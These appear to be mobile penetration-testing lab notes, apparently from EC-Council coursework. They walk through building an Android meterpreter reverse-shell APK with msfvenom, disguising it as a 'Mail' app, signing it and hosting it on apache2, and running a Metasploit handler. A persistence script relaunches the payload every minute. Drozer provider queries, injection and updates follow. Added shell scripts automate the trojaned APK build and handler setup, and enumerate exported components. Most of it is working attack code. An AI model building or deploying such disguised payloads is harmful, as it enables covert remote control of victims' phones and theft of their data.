RTFM for mobiles
# For Android Tamer:
install metasploit, zipalign and apache2
# staged payload (pair it with handler payload android/meterpreter/reverse_tcp)
msfvenom --platform android --arch dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.72.208 LPORT=8888 -f raw -o mail.apk
# stageless (inline) payload, worked for Samsung DUOS (pair it with handler payload android/meterpreter_reverse_tcp)
msfvenom --platform android --arch dalvik -p android/meterpreter_reverse_tcp LHOST=192.168.72.208 LPORT=4444 -f raw -o mail.apk
apktool d mail.apk
cd mail/res/values
nano strings.xml
# app_name is the label the launcher shows: MainActivity --> Mail
Save
cd ..
mkdir mipmap
copy the icon to mail/res/mipmap/ as mail.png (the file name is what @mipmap/mail resolves to)
nano ../AndroidManifest.xml   # the manifest sits in mail/, not under res/
<application android:label="@string/app_name" android:icon="@mipmap/mail">
apktool b mail -o mail_temp.apk
keytool -genkey -v -keystore eccouncil.Keystore -alias pentestandroid -keyalg RSA -keysize 2048 -validity 10000
# jarsigner produces a v1 (JAR) signature, which Android accepts below targetSdkVersion 30; SHA1 keeps old devices happy. Sign first, then zipalign: that order is right for v1 (with apksigner v2 it is the reverse, align first)
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore eccouncil.Keystore mail_temp.apk pentestandroid
sudo su -
zipalign -fv 4 mail_temp.apk /var/www/html/mail.apk
What for? zipalign is an archive alignment tool that provides important optimization to Android application (APK) files. The purpose is to ensure that all uncompressed data starts with a particular alignment relative to the start of the file. Specifically, it causes all uncompressed data within the APK, such as images or raw files, to be aligned on 4-byte boundaries. This allows all portions to be accessed directly with mmap() even if they contain binary data with alignment restrictions. The benefit is a reduction in the amount of RAM consumed when running the application.
service apache2 start
msfconsole
use exploit/multi/handler
# payload and LPORT must match the APK you built: staged -> android/meterpreter/reverse_tcp on 8888, stageless -> android/meterpreter_reverse_tcp on 4444
set payload android/meterpreter/reverse_tcp
options
set LPORT 8888
set LHOST 192.168.72.208
set ExitOnSession false   # keep listening after the first session so reconnects land here
exploit
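The repackaging, signing and handler steps above collected into one script. This is an added example and not part of the original notes; it assumes msfvenom, apktool, keytool, jarsigner and zipalign are on PATH, a placeholder keystore password of changeit, /var/www/html as the apache2 web root, and the invented file names mail.png and handler.rc. The two sed helpers and handler_rc are plain text transforms, so they can be sanity-checked without an Android toolchain, and payload_for ties the APK kind to the handler payload so the two cannot drift apart.

```shell
#!/bin/bash
# Added example (not from the original notes): the manual repackaging steps
# as one script. Assumptions: Android/Metasploit tools on PATH; LHOST, LPORT,
# label and icon come from the command line; STOREPASS and WEBROOT are placeholders.
set -eu

KEYSTORE=eccouncil.Keystore
ALIAS=pentestandroid
STOREPASS=changeit          # placeholder; pick your own
WEBROOT=/var/www/html       # apache2 document root the target downloads from

# Rewrite the app_name string in res/values/strings.xml (the launcher label).
set_app_label() {           # $1 = strings.xml, $2 = new label (no | or & characters)
    sed -i "s|\(<string name=\"app_name\">\)[^<]*\(</string>\)|\1$2\2|" "$1"
}

# Set android:icon on <application> in AndroidManifest.xml to @mipmap/$2,
# replacing an existing android:icon attribute or adding one when absent
# (msfvenom's template application tag only carries android:label).
set_app_icon() {            # $1 = AndroidManifest.xml, $2 = icon resource name
    if grep -q 'android:icon=' "$1"; then
        sed -i "s|android:icon=\"[^\"]*\"|android:icon=\"@mipmap/$2\"|" "$1"
    else
        sed -i "s|<application |<application android:icon=\"@mipmap/$2\" |" "$1"
    fi
}

# Map the APK kind to the payload name used by both msfvenom and the handler.
# A staged APK needs android/meterpreter/reverse_tcp on the handler, a
# stageless one android/meterpreter_reverse_tcp; mixing them up gives no session.
payload_for() {             # $1 = staged|stageless
    case "$1" in
        staged)    echo android/meterpreter/reverse_tcp ;;
        stageless) echo android/meterpreter_reverse_tcp ;;
        *) echo "usage: staged|stageless" >&2; return 1 ;;
    esac
}

# Emit an msfconsole resource file matching the APK (load with msfconsole -r handler.rc).
handler_rc() {              # $1 = staged|stageless, $2 = LHOST, $3 = LPORT
    local payload
    payload=$(payload_for "$1") || return 1
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j -z
EOF
}

build_apk() {               # $1 = staged|stageless, $2 = LHOST, $3 = LPORT, $4 = label, $5 = icon .png
    local work=mail
    msfvenom --platform android --arch dalvik -p "$(payload_for "$1")" \
        LHOST="$2" LPORT="$3" -f raw -o "$work.apk"
    apktool d -f "$work.apk" -o "$work"
    set_app_label "$work/res/values/strings.xml" "$4"
    mkdir -p "$work/res/mipmap"
    cp "$5" "$work/res/mipmap/mail.png"      # file name must match @mipmap/mail
    set_app_icon "$work/AndroidManifest.xml" mail
    apktool b "$work" -o "${work}_temp.apk"
    [ -f "$KEYSTORE" ] || keytool -genkey -v -keystore "$KEYSTORE" -alias "$ALIAS" \
        -keyalg RSA -keysize 2048 -validity 10000 -storepass "$STOREPASS" \
        -keypass "$STOREPASS" -dname "CN=$4"
    # jarsigner = v1 (JAR) signature, accepted below targetSdkVersion 30; sign
    # before zipalign, the right order for v1 (apksigner v2 would be the reverse)
    jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore "$KEYSTORE" \
        -storepass "$STOREPASS" "${work}_temp.apk" "$ALIAS"
    zipalign -f 4 "${work}_temp.apk" "$WEBROOT/$work.apk"
    handler_rc "$1" "$2" "$3" > handler.rc
    echo "APK at $WEBROOT/$work.apk, handler in handler.rc (msfconsole -r handler.rc)"
}

# Usage: ./repack.sh staged 192.168.72.208 8888 Mail ./icon.png
case "${1:-}" in
    staged|stageless) build_apk "$@" ;;
esac
```

Keep the keystore between runs: installing a later build over an earlier one only works when both carry the same signing key.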
When connected to meterpreter on the remote Android, drop this watchdog; it relaunches the payload's main activity every 60 s so a dead session comes back:
#!/system/bin/sh
# com.metasploit.stage is msfvenom's default package name; apktool b keeps it
PKG=com.metasploit.stage
while true
do
    am start --user 0 -a android.intent.action.MAIN -n $PKG/.MainActivity
    sleep 60
done
In meterpreter
upload /home/android/Downloads/Lab3.4/bc.sh /sdcard
shell
cd /sdcard
sh bc.sh   # the loop never returns, so this shell channel stays busy; sh bc.sh & keeps the channel usable
You should see something like this: Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity launchParam=MultiScreenLaunchParams { mDisplayId=0 mFlags=0 } }
mount -o remount,rw /mnt   # no space after the comma; needs root
tcpdump
https://www.andreafortuna.org/2018/05/28/how-to-install-and-run-tcpdump-on-android-devices/
adb push the tcpdump binary to the remounted location, then chmod 755 it
tcpdump -v -s 0 -w eccouncil.pc
tcpdump -v -s 0 -w com.bssys.mbcphone   # name the capture after the app under test
Drozer
# the drozer agent listens on 31415 on the device: forward the port, then connect
adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.list
run app.package.info -a [package_name]
run app.package.manifest [package_name]
run app.package.attacksurface [package_name]
run app.activity.info -a [package_name]
run app.activity.start --component [package_name] [activity_full_name]
run scanner.provider.finduris -a [package_name]
run app.provider.query content://[URI_to_the_content]
run app.provider.query content://[authority]/[table] --vertical   # authority = android:authorities from the manifest
run scanner.provider.injection -a com.android.insecurebankv2
run app.provider.insert content://com.vulnerable.im/messages --string date 1331763850325 --string type 0 --integer _id 7
# update/delete templates: settings/secure is guarded by WRITE_SECURE_SETTINGS, so from the agent these fail there; point them at the target app's provider
run app.provider.update content://settings/secure --selection "name=?" --selection-args assisted_gps_enabled --integer value 0
run app.provider.delete content://settings/secure --selection "name=?" --selection-args my_setting
run app.broadcast.info -a com.android.insecurebankv2
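Before pointing drozer at a package it helps to know which components the manifest actually exports. The script below is an added example, not part of these notes and not drozer code: it reproduces the gist of app.package.attacksurface and scanner.provider.finduris offline from the AndroidManifest.xml that apktool decodes, applying the pre-Android-12 rule that an activity, service or receiver without android:exported is exported when it has an intent-filter, and flagging providers that rely on the targetSdkVersion<17 default. For every exported provider it prints the content:// URI to feed to app.provider.query. The manifest in sample_manifest is constructed for the demo; the package com.example.bank and its component names are invented.

```shell
#!/bin/sh
# Added example (not from the original notes or from drozer): list an app's
# exported attack surface offline from an apktool-decoded AndroidManifest.xml.
# Assumes pre-API-31 export rules and apktool's one-tag-per-element layout.
set -eu

# Print one line per component:
#   <type> <fully.qualified.Name> exported=<verdict> [content://authority/]
attack_surface() {   # $1 = path to a decoded AndroidManifest.xml
    awk -v RS='<' '
    function emit(   verdict, line) {
        if (exported == "true")        verdict = "exported=true"
        else if (exported == "false")  verdict = "exported=false"
        else if (type == "provider")   verdict = "exported=unset(true only if targetSdkVersion<17)"
        else if (filter)               verdict = "exported=true(implicit,intent-filter)"
        else                           verdict = "exported=false"
        # resolve the manifest shorthands ".Foo" and bare "Foo" against the package name
        if (substr(name, 1, 1) == ".")   name = pkg name
        else if (index(name, ".") == 0)  name = pkg "." name
        line = type " " name " " verdict
        if (auth != "") line = line " content://" auth "/"
        print line
        type = ""
    }
    {
        tag = $1; sub(/>$/, "", tag)                   # element name, e.g. activity or /activity
        if (tag == "manifest" && match($0, /package="[^"]*"/))
            pkg = substr($0, RSTART + 9, RLENGTH - 10)
        else if (tag ~ /^(activity|service|receiver|provider)$/) {
            type = tag; name = ""; exported = ""; auth = ""; filter = 0
            if (match($0, /android:name="[^"]*"/))        name = substr($0, RSTART + 14, RLENGTH - 15)
            if (match($0, /android:exported="[^"]*"/))    exported = substr($0, RSTART + 18, RLENGTH - 19)
            if (match($0, /android:authorities="[^"]*"/)) auth = substr($0, RSTART + 21, RLENGTH - 22)
            if ($0 ~ /\/>/) emit()                        # self-closing tag: no children to wait for
        }
        else if (tag == "intent-filter" && type != "") filter = 1
        else if (tag ~ /^\/(activity|service|receiver|provider)$/ && type != "") emit()
    }' "$1"
}

# Constructed demo manifest (invented package com.example.bank) in apktool's output style.
sample_manifest() {
cat <<'EOF'
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.bank">
    <application android:label="@string/app_name">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name=".ChangePassword"/>
        <activity android:name="com.example.bank.DoTransfer" android:exported="true"/>
        <service android:name=".SyncService" android:exported="false">
            <intent-filter><action android:name="com.example.bank.SYNC"/></intent-filter>
        </service>
        <receiver android:name=".SmsReceiver">
            <intent-filter><action android:name="android.provider.Telephony.SMS_RECEIVED"/></intent-filter>
        </receiver>
        <provider android:name=".TrackUserProvider" android:authorities="com.example.bank.TrackUserContentProvider" android:exported="true"/>
        <provider android:name=".InternalProvider" android:authorities="com.example.bank.internal"/>
    </application>
</manifest>
EOF
}

# Usage: ./surface.sh mail/AndroidManifest.xml ; with no argument it runs on the sample.
if [ $# -eq 0 ]; then
    tmp=$(mktemp)
    sample_manifest > "$tmp"
    attack_surface "$tmp"
    rm -f "$tmp"
else
    attack_surface "$1"
fi
```

Everything reported as exported=true or implicit is what app.package.attacksurface would count; the provider lines give the authority to put behind content:// for app.provider.query and scanner.provider.injection, and an explicit android:exported="false" wins over an intent-filter, as the SyncService line shows.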